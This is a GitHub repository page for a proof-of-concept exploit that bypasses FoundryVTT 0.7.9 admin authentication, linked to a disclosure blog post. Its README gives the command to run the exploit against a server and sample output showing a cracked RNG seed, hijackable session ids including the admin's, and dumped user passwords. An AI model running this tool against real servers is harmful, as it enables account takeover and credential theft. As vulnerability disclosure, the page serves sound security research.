Skip to content

sum-catnip/foundry-rnghax

1 Branch0 Tags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

sum-catnipsum-catnip
public release
Jun 12, 2021
593ddaf · Jun 12, 2021

History

1 Commit
README.md
README.md
Jun 12, 2021
__init__.py
__init__.py
Jun 12, 2021
requirements.txt
requirements.txt
Jun 12, 2021
riddec_stonks.py
riddec_stonks.py
Jun 12, 2021
rnghax.py
rnghax.py
Jun 12, 2021

Repository files navigation

FoundryVTT admin authenttication bypass

For more info, read this blogpost. This repo contains the POC exploit to crack an admin session (rnghax.py) and also a file i used to calculate the accurracy of my base64 decode (riddec_stonks.py).

Install the deps like:

pip install -r requirements.txt

and run it like:

❯  python rnghax.py http://localhost:30000
server running foundry 0.7.9
data path at /home/catnip/.local/share/FoundryVTT
trying with tokens: ['db8x4llkgsqip7deh42cqrj3', '1puya3xxss9ftryt3x1zprlu']
found seed: 9993270706845480418:11192517990384452169
looking for sessions
----
found following sessions:
rid: ji38xvzub5j34pbd8vfksowi
rid: 1puya3xxss9ftryt3x1zprlu
rid: db8x4llkgsqip7deh42cqrj3
rid: fgo1aa8w635pk7bw44kkt35e
admin! rid: tmcg42wsw3g99fn55oyeciv6 uid: yYMaJwcVCcqJN09P name: Gamemaster password:
----
found following users:
uid: 9QMfMfcKwjnU0lQ7 name: lit password: af role: 2
uid: FGWnyV4lH2KmuRzd name: salad password: kektop role: 1
uid: R8xJ9pkyBP54OIsN name: memes password: topkek role: 1
uid: iGNzDi9gdSeZfgZH name: yeet password: top role: 1
uid: yYMaJwcVCcqJN09P name: Gamemaster password:  role: 4

About

foundryvtt admin authentication bypass POC exploit

catnip.fyi/posts/foundry-p3/

Topics

security exploit poc authentication-bypass foundry-vtt

Resources

Readme
Activity

Stars

2 stars

Watchers

2 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages